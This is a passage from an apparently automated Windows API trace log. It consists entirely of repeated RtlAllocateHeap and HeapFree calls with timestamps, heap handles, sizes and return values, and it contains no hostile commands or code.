hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0179.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0179.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0179.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0179.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0179.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0179.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0179.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0179.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0179.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0179.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0179.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0179.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0179.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0179.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0179.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0179.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0179.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0179.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0179.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0179.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0179.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0179.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0179.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0179.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0179.964] HeapFree (in: hHeap=0x2c0000, 